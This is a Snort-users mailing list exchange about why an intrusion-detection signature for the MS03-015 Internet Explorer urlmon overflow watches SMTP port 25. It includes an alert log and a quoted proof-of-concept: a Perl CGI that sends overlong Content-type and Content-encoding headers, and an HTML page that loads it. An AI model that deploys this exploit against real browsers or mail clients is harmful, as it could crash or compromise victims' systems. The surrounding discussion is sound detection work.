The rule looks for traffic on port 25 because it's possible to exploit
this vulnerability via an HTML e-mail message (since Outlook uses IE to
do HTML rendering). Rules for web-based attacks exist in the Community
rules as SIDs 100000118 and 100000119.
Alex Kirk
Research Analyst
Sourcefire, Inc.
I've seen the following alert triggered
[**] [1:3461:2] SMTP Content-Type overflow attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
09/25-11:11:06.816693 x.y.z.1:35499 -> 192.168.1.10:25
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:2776
***AP*** Seq: 0xCE9CF6A4 Ack: 0xDEEA2DBD Win: 0x40B0 TcpLen: 20
[Xref =>
http://www.microsoft.com/technet/security/bulletin/MS03-015.mspx][Xref
=> http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0113][Xref =>
http://www.securityfocus.com/bid/7419]
Yet the Microsoft fix is for Internet Explorer, yet the signature
looks for traffic on port TCP / 25. I think the signature should look
for this exploit on TCP port 80
Attached is the sample exploit, which would also only effect port 80..
!/usr/bin/perl
#
# Name this file as "urlmon-bo.cgi"
#
$LONG="A"x300;
print "Content-type: $LONG\r\n";
print "Content-encoding: $LONG\r\n";
print "\r\n";
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- -
<html>
<body>
<img src="urlmon-bo.cgi">
</body>
</html>
-------------------------------------------------------
SF.Net email is sponsored by:
Tame your development challenges with Apache's Geronimo App Server. Download
it for free - -and be entered to win a 42" plasma tv or your very own
Sony(tm)PSP. Click here to play: http://sourceforge.net/geronimo.php
_______________________________________________
Snort-users mailing list
Snort-users@lists.sourceforge.net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
